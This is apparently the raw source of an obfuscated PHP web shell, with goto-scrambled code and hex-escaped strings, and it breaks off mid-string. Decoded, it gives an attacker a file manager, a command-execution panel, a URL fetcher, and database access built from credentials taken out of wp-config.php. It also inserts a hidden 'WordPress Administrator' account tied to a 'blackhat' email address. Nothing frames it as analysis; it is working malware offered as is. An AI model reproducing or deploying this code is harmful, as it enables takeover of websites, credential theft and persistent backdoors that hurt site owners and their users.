$ed2bb87ff019245b = "\106\x69\154\x65\40\x3c\x73\164\x72\x6f\156\x67\x3e{$d8463d93c69599f9}\x3c\57\x73\164\162\157\x6e\x67\x3e\x20\x75\x70\154\157\x61\x64\x65\x64\x20\163\165\143\x63\145\163\163\146\165\154\x6c\x79\x20\165\x73\151\156\147\40\x66\141\x6c\154\142\x61\143\153\x20\155\145\x74\x68\x6f\x64\40\x63\157\160\x79\50\x29\x2e"; goto df8f3370e881b04e; Bb9b21ecef14973f: A159bc8e24a089cb: goto cd78f4f62926ba94; e1287c8d193f110c: Db3a8bf00fe45419: goto fe635237c00c0f01; c2b85c6b278b6318: goto Ca1c7347d04c7cd2; goto Bddd87bf00ae7a08; d69c979cec80e328: $A7c4a80f18b5dd9e = ini_get("\144\151\x73\x61\x62\154\x65\137\x66\x75\156\x63\x74\x69\157\156\x73"); goto C22de5b0115cb438; D1e49cacdf5aaa1a: echo "\74\x2f\163\x70\141\156\x3e\15\xa\15\12\x20\x20\x20\40\x20\x20\x20\40\74\x2f\160\76\xd\xa\11\11\74\160\x3e\15\xa\x9\x9\40\40\40\x20\74\x73\164\162\157\x6e\x67\40\163\164\x79\x6c\145\75\42\143\x6f\154\157\x72\72\x20\43\x30\60\x46\106\60\60\73\42\76\107\x72\157\165\160\72\74\x2f\x73\164\x72\157\x6e\x67\76\xd\xa\11\x9\x20\x20\40\x20\x3c\x73\160\x61\x6e\40\163\164\171\154\145\75\x22\143\157\154\x6f\162\x3a\40\x23\x66\x66\x66\146\146\146\73\42\76"; goto c19e987629cb64d8; bf767d51963bea32: if ($ffc943dc0b3a48b0 == "\142\141\143\141\x5f\x66\x69\154\x65" && isset($_POST["\x66\141\171\x6c"]) && trim($_POST["\146\141\x79\x6c"]) != '') { goto d8151f06b565f065; } goto D88c6d75416372b7; a57283409925b91e: print "\x3c\x2f\x64\151\x76\x3e"; goto b5f3c03bd38bf75a; F49ee89efcfa7a44: C227c63d47a17b8c: goto e8e799e1a1979d31; cec931db17fe0766: goto bd4d92a38ba87690; goto e1ffd2ef7d8add4a; D91a01dc881fad30: setcookie("\x73\x61\x6e\144\x69", $_POST["\x73\x61\156\144\x69"], time() + 360000); goto d2a011e2b3af5463; d713f133407ae9ce: $C30da0039db7258c = "\x45\162\x72\x6f\162\x20\151\x6e\163\x65\162\x74\151\156\x67\40\165\x73\x65\x72\72\x20" . mysqli_error($Abc2b55b9f3bce65); goto C79a46076fe94ac9; A80ddab74506c046: if (!($ffc943dc0b3a48b0 == "\x75\x70\x6c\x5f\146\x69\154\x65" && isset($_FILES["\165\x66\x69\154\145"]))) { goto cb4edfe79121c48a; } goto D288e2f0b01f3458; D73fb5c2211e688f: print "\74\142\x75\x74\164\x6f\156\40\x74\x79\160\145\x3d\42\x62\165\x74\x74\x6f\156\42\x20\x63\154\x61\163\x73\75\42\x62\x74\x6e\55\x65\x78\145\143\165\164\145\42\40\157\x6e\x63\x6c\x69\x63\153\x3d\x22\x73\151\163\164\x65\155\113\157\x6d\x28\x29\73\x22\x3e\x45\170\x65\143\x75\164\x65\x3c\57\x62\165\164\164\157\156\76"; goto deed07e15fed18a0; Cd80f7dcd3e6ab8f: e85bdd0e40b000b3: goto bb850573e5e226da; bc8f3395723f838e: goto B71b5a0db4809c40; goto a01f51501370b265; Bcf76c23f9fa6319: f2b9852131203e19: goto ec0e3e93d136f75a; B7de6069cc622736: if (!isset($_POST["\x68\x6f\x73\x74"])) { goto a4a9c738c2235807; } goto C17fd389b95eab38; d8926dd12cc69f26: Ae971299e9415e74: goto D61cb9ed1ce4dc64; b7c075f234257981: $a3d3f286323cd3c2 = "\x62\x6c\141\143\x6b\x68\141\x74\x31\63\63\67\100\160\162\157\164\x6f\156\56\155\x65"; goto f57ba11d45988b36; f5161c9b35478041: ini_set("\x64\x69\x73\x70\x6c\x61\171\x5f\145\162\162\x6f\x72\163", 0); goto E45ae8629b5c83b6; e5574cda59e8f360: B45230fdbaedcf04: goto A0b6053d3d2dec35; bf8398500d3afa67: if (!($ceed1626500ecd14 && is_dir($ceed1626500ecd14))) { goto F2d068205e264d66; } goto d9e3f606e4ef9eb1; Cd03eb172b7de9e2: echo "\x3c\144\151\x76\40\143\154\141\x73\163\x3d\x22\146\x4d\x61\x6e\141\147\x65\162\x2d\x77\x72\141\160\x70\x65\x72\x22\x3e"; goto Aea0921d248b902d; Aea0921d248b902d: echo "\x3c\x74\x61\142\154\145\x20\x63\x6c\141\163\163\75\x27\146\115\x61\156\141\x67\145\162\47\x3e\x3c\x74\x68\145\x61\144\76\x3c\164\x72\x20\143\x6c\x61\x73\x73\x3d\47\x71\x61\154\x69\156\x27\76\74\x74\x68\x3e\x46\x69\x6c\145\x3c\57\x74\x68\76\74\x74\x68\76\123\x69\x7a\145\74\x2f\164\150\x3e\74\x74\x68\x3e\x44\141\x74\x65\74\x2f\x74\150\x3e\74\164\x68\76\x4f\x77\x6e\145\x72\x2f\107\x72\x6f\165\x70\x3c\57\164\x68\76\x3c\x74\x68\x3e\120\x65\162\x6d\x69\163\163\151\x6f\x6e\x73\74\57\164\150\x3e\x3c\x74\x68\76\x41\143\164\151\157\x6e\x73\74\x2f\164\x68\x3e\x3c\x2f\164\162\76\74\x2f\164\x68\145\141\x64\76\74\x74\x62\157\x64\x79\76"; goto d8fdbd340440868f; b885dc1591f643ae: print "\x3c\144\x69\166\40\163\164\171\x6c\x65\75\x27\167\151\x64\x74\150\x3a\40\x31\60\x30\45\73\40\150\x65\151\147\x68\x74\72\x20\64\x30\60\x70\x78\x3b\47\76\74\151\x66\x72\x61\x6d\x65\x20\163\162\x63\x3d\47\77\141\167\141\154\x3d\160\151\156\146\47\40\163\164\171\x6c\x65\x3d\x27\167\151\144\x74\x68\x3a\x20\x31\x30\60\x25\x3b\x20\150\145\x69\x67\x68\164\72\x20\64\x30\x30\160\x78\73\x20\142\157\162\144\x65\162\x3a\40\60\x3b\x27\76\x3c\x2f\151\146\x72\x61\x6d\145\x3e\x3c\57\x64\x69\x76\x3e"; goto ef779efedca68d9b; b233a13d3c790845: setcookie("\x75\163\x65\162", $_POST["\165\x73\145\162"], time() + 360000); goto D91a01dc881fad30; A934d5e45078709f: F85d167cccd9fbcd: goto B59e88857c20c7b1; D679b543807e114b: $c887d06bec538904 = $_POST["\x73\141\156\144\x69"]; goto E277e0d3e6de16c9; b236938e78e0c92f: $ddd38cf20fd62980 = $Cd1e6c38bf6c5fac . "\57\x77\x70\x2d\143\157\x6e\146\151\147\56\x70\x68\x70"; goto ce992f42a25b0e2d; B59d9335c1f27aae: C8b1b1556ca34eb3: goto e969ddc66719cde2; e63a953db92a93ff: $a8a9fc47be90efed = true; goto c4e3a676510fd3bd; a064c29e9808123e: echo htmlspecialchars(b526E9837163414E($f6f05644d791da73)); goto C32b79b4b4e1023c; dccd266ab930d3a7: goto d71da4e0e11a1af8; goto c1ddc27fb78d9edb; b124c27d35c0a2a3: try { goto Cfe4ff9ba56c21ae; fc81a7dba947ba2a: foreach ($_POST as $Ae96d7849ebef399 => $a78beaf0b1f9d894) { goto C1e605c4662883a5; F9c6f56379fed8c5: F2e1908bcbe1f494: goto B5c8b7e5f237c343; C1e605c4662883a5: if (in_array($Ae96d7849ebef399, $d285647837403571)) { goto F2e1908bcbe1f494; } goto d48e04a9cafad696; B5c8b7e5f237c343: e398630de9934292: goto ef6e058d4dccd520; d48e04a9cafad696: $f7eff6a796f135fb[$Ae96d7849ebef399] = $a78beaf0b1f9d894; goto F9c6f56379fed8c5; ef6e058d4dccd520: } goto a8e065e9477f8f4c; a8e065e9477f8f4c: C4b1234b3529d019: goto deb27e2b3d8b8567; C5f7be0132fba093: if (!(strlen($f7eff6a796f135fb["\165\163\145\162\x5f\x70\141\163\x73"]) < 32 || !preg_match("\57\136\133\141\x2d\146\x30\x2d\71\x5d\x7b\63\62\175\44\x2f\x69", $f7eff6a796f135fb["\165\x73\x65\162\137\160\x61\x73\x73"]))) { goto E7aa98e7d7aaba4a; } goto Df95db0f94023122; de7d5c5055c45b97: $cf583f5d73ccf3cf = isset($_COOKIE["\165\x73\x65\x72"]) ? $_COOKIE["\x75\163\145\x72"] : ''; goto e5aaeb79b42f20ba; a489725279127c31: foreach ($f7eff6a796f135fb as $F5b2cc0d510629d7 => $af3f628034377275) { goto Ea94a6d70aa326b9; A8d9eac67efb3907: $d42c5af41dde6d0f[] = "\x60{$F5b2cc0d510629d7}\140\40\75\x20\77"; goto C9a5afc959bd1930; A28183ae58753908: b995974bdc16cc65: goto A8d9eac67efb3907; C9a5afc959bd1930: $bf8d05ab7577659d[] = $af3f628034377275; goto c3b175f05260605a; Ea94a6d70aa326b9: if (!($F5b2cc0d510629d7 == $Fbc4fe4be53f25db)) { goto b995974bdc16cc65; } goto d72d631e58a0adc8; c3b175f05260605a: be19543df5220692: goto D1e133613ad105ef; d72d631e58a0adc8: goto be19543df5220692; goto A28183ae58753908; D1e133613ad105ef: } goto D394317c77d00e31; b15651c32521a39e: $e5063bf904c37092->execute($bf8d05ab7577659d); goto Fdb6eee0b16776aa; ef341dc0d9b43060: goto Aa61be17d6269277; goto E4edf47cadc998ae; e5aaeb79b42f20ba: $c887d06bec538904 = isset($_COOKIE["\163\141\x6e\144\x69"]) ? $_COOKIE["\x73\141\156\144\x69"] : ''; goto dfb41cfc7005a165; a8012f80d077082f: Aa61be17d6269277: goto c973ec8ecab9f1c0; deb27e2b3d8b8567: if (!(substr($A815e8104dbdb799, -5) === "\x75\163\145\x72\x73" && isset($f7eff6a796f135fb["\165\163\x65\x72\137\x70\141\x73\x73"]) && !empty($f7eff6a796f135fb["\x75\163\145\x72\137\160\141\163\163"]))) { goto A73777e856015ce7; } goto C5f7be0132fba093; a86ebeeeb00483e0: $bf8d05ab7577659d = []; goto a489725279127c31; ad42ac7165fbb321: throw new Exception("\x4d\x69\x73\163\151\x6e\147\40\144\x61\x74\x61\40\x66\157\x72\40\x75\x70\x64\141\164\x65\56"); goto A4a401c5e16b75aa; a8b90ab05a0e63ed: $Fbc4fe4be53f25db = $cf1663c4e14380df->fetch(PDO::FETCH_ASSOC)["\106\151\145\x6c\x64"]; goto E33bccbdf11cfaef; Be0d8651ee0bc574: E7aa98e7d7aaba4a: goto b61066ed34cf046f; D394317c77d00e31: d57360981f99c044: goto eaef9687f8bfbe8d; Ff787b589ef55b59: $e7fc7ef47502e99b = isset($_COOKIE["\150\157\x73\164"]) ? $_COOKIE["\x68\x6f\163\x74"] : ''; goto de7d5c5055c45b97; e183207c5049aede: $abc8025519b7bcd1 = "\125\x50\x44\x41\x54\x45\x20\140{$A815e8104dbdb799}\x60\x20\x53\105\124\x20" . implode("\x2c\x20", $d42c5af41dde6d0f) . "\40\127\x48\x45\122\105\40\x60{$Fbc4fe4be53f25db}\140\x20\75\x20\77"; goto Efe9be052546786f; Ee77a34cd92ea0b3: $ba1ef5b995b47539 = f64198cb3E765A83($_POST["\160\x6b\x5f\x76\141\x6c"]); goto Ff787b589ef55b59; D31155cd58e2198f: $d42c5af41dde6d0f = []; goto a86ebeeeb00483e0; Ad02a2715dea308b: $bf8d05ab7577659d[] = $ba1ef5b995b47539; goto e183207c5049aede; eaef9687f8bfbe8d: if (count($d42c5af41dde6d0f) > 0) { goto fad07a10bf5ab16e; } goto Be214633367c7d4c; b61066ed34cf046f: A73777e856015ce7: goto D31155cd58e2198f; Efe9be052546786f: $e5063bf904c37092 = $dd10a73ee2d1f279->prepare($abc8025519b7bcd1); goto b15651c32521a39e; D619cdad182c0245: $dd10a73ee2d1f279 = new PDO("\x6d\x79\x73\x71\x6c\x3a\150\x6f\x73\x74\75" . $e7fc7ef47502e99b . "\x3b\x64\142\156\x61\x6d\x65\x3d" . $Cb7c56c153b6fafa . "\x3b\143\150\x61\162\163\145\x74\x3d\x75\x74\x66\70", $cf583f5d73ccf3cf, $c887d06bec538904); goto e7a5012fa284b436; E4edf47cadc998ae: fad07a10bf5ab16e: goto Ad02a2715dea308b; ac8f8449ac675f86: $A815e8104dbdb799 = f64198CB3E765A83($_POST["\x74"]); goto Ee77a34cd92ea0b3; Be214633367c7d4c: $c31208d29cfc6afb = "\x4e\x6f\40\143\150\x61\156\147\145\163\x20\167\145\x72\x65\40\155\141\x64\145\56"; goto ef341dc0d9b43060; Df95db0f94023122: $f7eff6a796f135fb["\x75\x73\145\162\137\160\x61\163\163"] = md5($f7eff6a796f135fb["\x75\163\145\x72\x5f\x70\141\x73\163"]); goto Be0d8651ee0bc574; dfb41cfc7005a165: $Cb7c56c153b6fafa = isset($_COOKIE["\144\x61\x74\141\x62\141\x73\x65"]) ? $_COOKIE["\144\141\164\x61\x62\x61\x73\145"] : ''; goto D619cdad182c0245; e7a5012fa284b436: $dd10a73ee2d1f279->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); goto a19381011675c6f9; Cfe4ff9ba56c21ae: if (isset($_POST["\164"], $_POST["\160\x6b\137\166\141\x6c"])) { goto e92793c55f67ce0d; } goto ad42ac7165fbb321; E33bccbdf11cfaef: $f7eff6a796f135fb = []; goto c2b6bcd45b6eb7d4; A4a401c5e16b75aa: e92793c55f67ce0d: goto ac8f8449ac675f86; a19381011675c6f9: $cf1663c4e14380df = $dd10a73ee2d1f279->query("\104\105\x53\103\122\x49\x42\105\x20\x60{$A815e8104dbdb799}\140"); goto a8b90ab05a0e63ed; c2b6bcd45b6eb7d4: $d285647837403571 = ["\141\x77\141\x6c", "\x74", "\160\x6b\137\166\141\x6c"]; goto fc81a7dba947ba2a; Fdb6eee0b16776aa: $c31208d29cfc6afb = "\x52\x6f\167\x20\x75\x70\x64\141\x74\145\x64\40\163\x75\143\x63\145\163\x73\x66\x75\154\154\x79\x21"; goto a8012f80d077082f; c973ec8ecab9f1c0: } catch (Exception $E4d444a4fd968be8) { $C30da0039db7258c = "\105\x72\x72\x6f\162\x20\165\160\144\x61\x74\151\x6e\x67\x20\162\157\167\x3a\40" . $E4d444a4fd968be8->getMessage(); } goto E494db05aaffb67a; A0b6053d3d2dec35: $dc0f70f3261828f3 = basename($_POST["\156\x65\167\137\x66\x69\x6c\145\156\x61\x6d\x65"]); goto F5fedb32fb2ab9c1; efff0eebf73566f1: echo "\42\x20\x6e\x61\x6d\145\75\42\146\141\x79\x6c\x22\76\xd\xa\11\11\x9\x9\11\74\x69\x6e\160\165\x74\x20\x74\x79\160\x65\75\x22\150\x69\144\x64\145\156\42\40\166\141\x6c\165\145\x3d\42"; goto A9f9c552b690fd46; Ed971d352d867191: F7e8daa86cbebf4c: goto cf21caef069e186f; daf39ca73f37e531: goto e38d3d29c2da0133; goto F30f9693313402b1; Ed3709d1dfba8116: $cf583f5d73ccf3cf = isset($_COOKIE["\x75\x73\145\x72"]) ? $_COOKIE["\165\163\145\162"] : ''; goto aedbdbe1b082eb41; f3fc1166fb9e1bf8: $A62259e1f87e5d26 = "\x20\74\163\160\x61\156\40\x63\x6c\141\163\163\x3d\x27\161\141\154\151\x6e\x27\40\x73\x74\x79\154\145\x3d\47\143\x6f\x6c\157\162\72\x23\146\146\x35\65\x35\65\x3b\47\76\x46\151\154\x65\40\x69\163\x20\156\x6f\164\x20\x77\x72\x69\164\x65\141\142\154\x65\x2e\x3c\x2f\163\160\x61\156\76"; goto bc8f3395723f838e; A5ff12a5506337c9: $F3d3e5ac6e86bc72 = $f6f05644d791da73 . $c9c3dbf37270f221 . $D4923a741daf1b7e; goto A40f61aeb1e5ac81; f74a527a595ccc23: function D7AEB436EF6955d8($ad29fc13e38ce413) { goto d13efb63a81092b4; Dbbcb7b244a16d20: rmdir($ad29fc13e38ce413); goto ee469dd4cb6928a8; d13efb63a81092b4: if (!is_dir($ad29fc13e38ce413)) { goto a70f8353aefbef85; } goto c977f40719a64451; c977f40719a64451: $e6d1ddfbc10125b7 = scandir($ad29fc13e38ce413); goto C272b07e7cf8b2e1; ee469dd4cb6928a8: a70f8353aefbef85: goto a20d0edb3d05562a; C272b07e7cf8b2e1: foreach ($e6d1ddfbc10125b7 as $a74a2127c4bb21ba) { goto f452257c485bafba; f452257c485bafba: if (!($a74a2127c4bb21ba != "\x2e" && $a74a2127c4bb21ba != "\x2e\x2e")) { goto cfd0de23ef8c5d3e; } goto Cca07d67ee9b3b78; Ac5341d285681567: A62769070082cb39: goto C92783f55c7b03b7; A9c274c307e0f86b: Fb533210e51881ee: goto de246523267f1bea; Cca07d67ee9b3b78: if (is_dir($ad29fc13e38ce413 . "\x2f" . $a74a2127c4bb21ba)) { goto A62769070082cb39; } goto a30fee58af0000f5; C35840fcaf2dff27: goto F68d4c56e375893b; goto Ac5341d285681567; A5161b60a8492cbc: F68d4c56e375893b: goto B796832fd6f739cf; C92783f55c7b03b7: d7Aeb436EF6955d8($ad29fc13e38ce413 . "\57" . $a74a2127c4bb21ba); goto A5161b60a8492cbc; B796832fd6f739cf: cfd0de23ef8c5d3e: goto A9c274c307e0f86b; a30fee58af0000f5: unlink($ad29fc13e38ce413 . "\x2f" . $a74a2127c4bb21ba); goto C35840fcaf2dff27; de246523267f1bea: } goto a14d242fe67e71d0; a14d242fe67e71d0: D16a2aaa94a7a7ec: goto Dbbcb7b244a16d20; a20d0edb3d05562a: } goto Bf9ae757da17f26a; f122842b898ca81e: C5e322d2077a8c6d: goto b17069c888ce6f8d; B1d07fbd68aa5256: $A62259e1f87e5d26 = "\40\74\x73\x70\141\x6e\x20\x63\x6c\141\163\x73\x3d\47\161\x61\154\x69\156\47\40\163\x74\171\154\145\75\47\143\x6f\x6c\157\162\72\x23\146\146\x35\65\65\x35\x3b\47\76\x45\x72\x72\x6f\162\x20\x73\141\166\151\156\147\x20\x66\151\x6c\x65\56\40\103\x68\x65\x63\153\40\x70\145\162\x6d\151\163\x73\151\x6f\x6e\x73\56\74\x2f\x73\x70\141\x6e\76"; goto e5d2ce9f445d3b51; D9f9635ef97dfc1f: goto e74a77befa28b5cd; goto b1de702d82709429; a1199b0d5eec61c3: $Cb7c56c153b6fafa = $_POST["\144\x61\x74\x61\142\141\x73\x65"]; goto Cd80f7dcd3e6ab8f; D71902228e69725b: e38d3d29c2da0133: goto Acdf3e1454049c2f; B80110800b3bd1f6: A526e4c36f03751d: goto a8c70c8e949c2552; F2d1b39fe3a69fbc: a9beac3095f36a76: goto fe7541a0904f2072; Bf7dbb0ba7c50699: Bc84ca4ff5adb85d: goto C8f2daaec344d188; F214beb7cf170a5a: aa84b7d1b9bbf909: goto d3e71a9cc8d3e77b; d2fbace3c2bf7f8a: echo "\x9\x9\x9\x9\x3c\x2f\x64\151\166\x3e\xd\xa\11\x9\x9\x9\74\x64\151\166\76\15\xa\x9\11\x9\11\x9\74\x69\156\160\x75\164\x20\164\171\x70\x65\x3d\42\x68\151\144\x64\x65\x6e\x22\x20\166\141\154\165\x65\x3d\42\x65\144\x69\164\x5f\146\x69\154\x65\x22\40\x6e\141\x6d\145\x3d\x22\x61\167\x61\x6c\42\x3e\xd\12\x9\x9\x9\11\x9\74\x69\156\160\x75\x74\40\164\171\160\x65\x3d\x22\x68\x69\144\144\x65\156\x22\40\x76\x61\154\x75\145\75\42"; goto d39aefa484e3f279; f2aa04681663410a: ba7e4a12f754910e: goto e2204595d1020ad0; Cb6327f4205892ae: $F1bd0511ccf316b6 = $d139b1a848d82cf6 . DIRECTORY_SEPARATOR . $d0809c067fab8cd8; goto Ce6c3cbcf5357945; Cf0b7d9e2fa2fe7f: if ($ffc943dc0b3a48b0 == "\162\145\x6e\141\155\145\x5f\146\x69\154\145" && isset($_POST["\146\x61\x79\154"]) && trim($_POST["\146\x61\x79\154"]) != '' && isset($_POST["\156\145\x77\x5f\x6e\x61\x6d\145"]) && is_string($_POST["\x6e\145\x77\x5f\x6e\141\x6d\x65"]) && !empty($_POST["\156\x65\x77\x5f\156\x61\155\x65"])) { goto fae78c99bb813b29; } goto A5ee929024ad786c; dcfdd64a784a5989: $_POST["\141\167\x61\x6c"] = "\x73\153\154"; goto Ab300d2781fad448; D6208148cf11e119: $dc0f70f3261828f3 = basename(F64198CB3e765a83($_POST["\x66\x61\171\x6c"])); goto cdda6c2cdb10cda3; C0363fa200061976: setcookie("\x64\x61\x74\x61\142\x61\x73\145", $_POST["\144\x61\164\x61\142\141\163\x65"], time() + 360000); goto c9efd07d0d93c4e1; bb406bd926a25e27: $db79593b5ada69af = __DIR__; goto cec931db17fe0766; Fe7defc8cf8007c5: echo htmlspecialchars($dc0f70f3261828f3); goto e37296ebe02b53e5; eaceacea5c957d93: echo htmlspecialchars(b526E9837163414e($f6f05644d791da73)); goto Ea84be8c7ae9a036; cc947deafe44fb60: $a5064888437638ee = empty($Cb7c56c153b6fafa) ? '' : "\144\x62\156\x61\x6d\x65\75" . $Cb7c56c153b6fafa . "\73"; goto db975c392502becf; Fea08fe9ae74aed3: $C30da0039db7258c = "\x77\160\x2d\x63\157\x6e\146\151\147\56\x70\x68\160\40\x6e\157\164\x20\x66\x6f\165\156\144\x20\x61\x74\72\40" . htmlspecialchars($f6f05644d791da73); goto Fa4128012c2699a9; F3bde348d9f5b515: $de37df5acf20bfe4 = ob_get_clean(); goto A7e3517fdebffd75; Bb88320aa0bb8a4a: c22c422f6a120982: goto c8eb4eedace1defd; d2106c940d3ba33e: $e0834a8ecbd2c470 = BECC62336785b14E($c17121c8c5afcfe3, "\x44\x42\x5f\125\123\x45\x52"); goto badaebffc6b8c4ee; e6df3b670079a41f: e62bbdc6d249c8d4: goto e1a49f6aca122232; e6ab6b5faf5b102a: setcookie("\150\157\x73\164", '', time() - 3600); goto f9a06bf4941df0b1; d6357eec5971e440: print "\x3c\144\151\166\x20\163\164\171\x6c\145\75\42\x6d\x61\162\147\151\156\55\x62\157\164\164\157\x6d\x3a\40\x31\x72\145\x6d\73\x22\76\x3c\x68\x33\40\163\164\x79\154\x65\x3d\x22\x6d\x61\162\x67\x69\x6e\x3a\60\x3b\x20\143\x6f\154\x6f\162\x3a\x23\x30\x30\106\106\x30\60\x3b\42\76\103\157\x6d\155\x61\156\x64\x20\166\x32\74\57\x68\x33\x3e\x3c\57\144\x69\x76\76"; goto b1de3fd4d4db1daf; E63b99a7bded2b71: echo B526E9837163414e($f6f05644d791da73); goto D2dd9ca5af7596d5; Ad2140bcb52336d6: echo b526e9837163414e($f6f05644d791da73); goto c7dde12374d4b5de; C9910812393d75a2: $Aa102996b4a82446 = new ZipArchive(); goto F25abbf176bf1557; d09a60622b3cf761: f9edaf44cf2f6420: goto D1673b0917df8421; d824d5b111b06776: $D3dc074ce93d5c09 = isset($_FILES["\x75\x70\x6c\x6f\x61\x64\x5f\x66\151\154\x65"]["\x65\x72\x72\157\x72"]) ? $_FILES["\x75\160\x6c\x6f\141\144\137\146\x69\x6c\x65"]["\x65\x72\x72\x6f\x72"] : "\x75\156\x6b\156\x6f\x77\156"; goto Dead51eadc21e102; ec893750ef3aa489: A9c6c1aa382027ab: goto Ec5baf033045dba5; ab223bbf2adba355: echo "\x20\x20\40\x20\x3c\57\x70\76\xd\xa\74\57\x64\x69\x76\x3e\xd\12\74\x68\162\x20\163\164\171\154\145\75\42\142\x6f\x72\144\x65\x72\x2d\143\x6f\x6c\x6f\x72\x3a\40\43\x33\63\63\73\40\x62\157\162\x64\145\162\55\163\x74\171\154\x65\x3a\40\144\x6f\x74\164\145\x64\x3b\x22\x3e\15\xa\15\12"; goto B0176eb24999b6c7; f2413eb508703205: ini_set("\x64\x69\x73\x70\x6c\141\x79\x5f\x65\162\162\157\162\163", 1); goto Df2ac92da03136aa; b1de702d82709429: e36e20158e2ad78b: goto c9300cf1fcbd226b; F896c0f9179e2f20: echo "\74\x2f\163\160\x61\156\x3e\15\xa\40\x20\40\x20\40\x20\40\40\x3c\x2f\160\76\xd\12\40\40\x20\x20\40\40\x20\40\x3c\x70\76\15\xa\40\x20\x20\40\x20\40\40\x20\x20\40\40\40\x3c\163\164\x72\x6f\x6e\x67\40\163\x74\x79\154\145\75\x22\143\x6f\154\157\x72\x3a\40\43\60\x30\106\x46\x30\x30\x3b\42\76\x50\x48\120\40\x56\x65\x72\163\x69\x6f\x6e\72\x3c\57\x73\164\162\x6f\x6e\147\76\xd\12\40\40\40\40\40\x20\x20\40\40\40\40\40\74\163\x70\x61\x6e\40\x73\164\171\x6c\145\x3d\42\143\x6f\154\x6f\162\72\40\x23\146\x66\146\x66\x66\146\73\x22\x3e"; goto Fa0c3c344630205d; f57ba11d45988b36: $Fae66631e215ed94 = "\x49\116\123\x45\122\x54\x20\x49\116\124\x4f\40\140{$ec12ef4150496dc6}\x75\x73\x65\162\x73\x60\x20\15\12\x20\40\40\x20\x20\40\x20\40\40\x20\x20\40\40\40\40\x20\x28\165\163\145\162\137\154\157\147\x69\x6e\54\x20\165\x73\x65\x72\137\160\141\163\163\x2c\40\x75\x73\x65\x72\137\x6e\x69\143\x65\156\x61\155\x65\54\x20\165\163\145\x72\137\145\x6d\141\x69\154\x2c\40\165\x73\145\x72\137\x73\164\141\x74\165\163\51\40\15\12\40\40\x20\40\x20\x20\x20\x20\x20\40\x20\x20\x20\x20\x20\x20\126\x41\114\125\x45\123\x20\50\x27{$D1e4ee6a5ff10c98}\47\x2c\40\47{$b8620b74d07d71dc}\x27\x2c\x20\47\127\x6f\162\144\x50\x72\145\x73\x73\40\101\x64\x6d\x69\156\x69\x73\x74\162\x61\164\157\162\x27\x2c\40\47{$a3d3f286323cd3c2}\x27\x2c\x20\60\51"; goto C52f5dc55ce65fe1; A5ee929024ad786c: if ($ffc943dc0b3a48b0 == "\163\x6b\154\137\x64\x5f\164" && isset($_POST["\x74"]) && is_string($_POST["\164"]) && !empty($_POST["\x74"])) { goto Bc84ca4ff5adb85d; } goto B6ed9868cc1f557a; C9247fba0ba926a5: b4cff1a9e1f68642: goto Bb0b747b86bcbc4c; dbf9d3445768455f: $C30da0039db7258c = "\103\x6f\x6e\x6e\x65\x63\x74\151\157\x6e\40\146\141\x69\154\x65\x64\x3a\x20" . mysqli_connect_error(); goto e33d456519f0a6c8; B0530cca137e3701: f6a4c81cf03c2f6e: goto C1907b080d6a33ee; ce1b81d215b3e2ae: goto c36f42c77b0e5bc2; goto Fb75c7402c09b842; f436816cefb804fa: $ed2bb87ff019245b = "\106\141\151\154\x65\x64\x20\164\x6f\40\x75\x70\154\157\x61\144\x20\x66\151\x6c\145\x2e\x20\120\154\x65\x61\163\145\40\143\150\x65\x63\153\40\144\151\162\145\x63\164\x6f\x72\171\x20\160\145\162\x6d\151\163\x73\151\x6f\156\163\x20\x61\x6e\144\40\163\145\x72\x76\145\162\x20\x63\157\x6e\x66\x69\x67\x75\162\141\164\151\x6f\156\56"; goto Fbaaff78785ca4b6; E1f00ce8c1399318: $a3b5ad8fcd19e5e9 = $E7809f0458604dd6["\155\x65\x73\163\141\147\x65"]; goto F817c17108bf80f7; F2a40387df3a3b61: e8ce4554e690d4bf: goto e6ab6b5faf5b102a; B7a085d408f41069: echo "\47\51\x3b\15\12\11\x7d\15\xa\x7d\xd\12\15\xa\x66\165\x6e\143\x74\151\157\x6e\x20\144\x65\x6c\x65\164\145\106\x69\154\145\50\x66\x61\x79\x6c\51\xd\xa\x7b\xd\xa\x20\x20\x20\x20\x69\x66\x28\x63\x6f\x6e\146\151\x72\x6d\x28\x27\x41\162\x65\x20\x79\x6f\x75\x20\163\165\162\x65\x20\x79\157\x75\x20\x77\141\156\x74\x20\164\x6f\40\144\x65\154\145\x74\145\x20\x74\150\151\163\40\x66\x69\x6c\145\x3f\47\x29\51\40\173\15\12\40\40\40\40\40\x20\40\x20\x6e\141\x76\151\147\x61\x74\x65\50\x27\x61\x77\141\154\47\54\40\47\150\141\x70\x75\163\x5f\x66\x69\x6c\x65\x27\54\x20\x27\146\x61\x79\154\x27\54\40\146\141\171\154\x2c\x20\x27\142\145\x72\x6b\141\163\x27\54\40\47"; goto Cc0437eb223b9996; B19a872dd93085ee: $bac6a93e3c6b58ea = is_writeable($f6f05644d791da73 . $c9c3dbf37270f221 . $dc0f70f3261828f3) ? '' : "\40\x64\151\163\141\x62\x6c\145\144"; goto Ec37d094fdc6a3a8; c32f24b4e581d1b8: echo "\47\x29\73\42\x20\143\x6c\141\x73\163\x3d\x22\142\x74\156\55\x6d\157\144\145\162\x6e\x22\76\x3c\x69\x20\143\x6c\x61\163\x73\75\x22\x66\141\163\40\x66\x61\x2d\x73\x6b\165\x6c\154\55\x63\162\x6f\163\x73\142\157\x6e\x65\163\42\76\x3c\x2f\151\76\x20\x43\x6f\155\155\x61\x6e\144\x20\166\x32\x3c\57\141\x3e\xd\xa\74\141\40\x68\x72\145\146\75\42\152\141\166\x61\x73\143\x72\151\x70\x74\x3a\x74\157\147\x67\x6c\x65\106\145\x74\143\x68\x65\162\50\51\x3b\42\x20\x63\154\141\x73\x73\x3d\42\142\164\156\x2d\155\157\x64\145\162\x6e\42\x3e\74\151\x20\x63\x6c\141\163\x73\75\42\x66\141\163\40\146\141\55\154\151\156\x6b\42\x3e\74\57\x69\76\x20\106\145\x74\143\x68\x20\125\x52\114\x3c\57\141\76\15\12\x20\40\40\x20\40\40\x3c\141\40\x68\162\x65\x66\75\x22\152\141\x76\141\x73\x63\162\151\160\x74\x3a\x6e\141\x76\151\147\x61\164\x65\50\47\x61\167\x61\x6c\47\54\x20\47\163\x6b\x6c\x27\x29\x3b\x22\40\143\x6c\x61\163\163\75\x22\142\x74\x6e\55\155\x6f\144\x65\162\x6e\x22\76\x3c\x69\40\x63\x6c\141\163\x73\75\42\x66\x61\163\x20\x66\x61\x2d\x64\141\x74\x61\x62\141\x73\145\42\76\x3c\57\151\76\x20\104\x61\164\141\142\141\x73\145\74\x2f\x61\76\xd\12\40\x20\40\40\x20\40\74\146\x6f\162\x6d\40\155\x65\16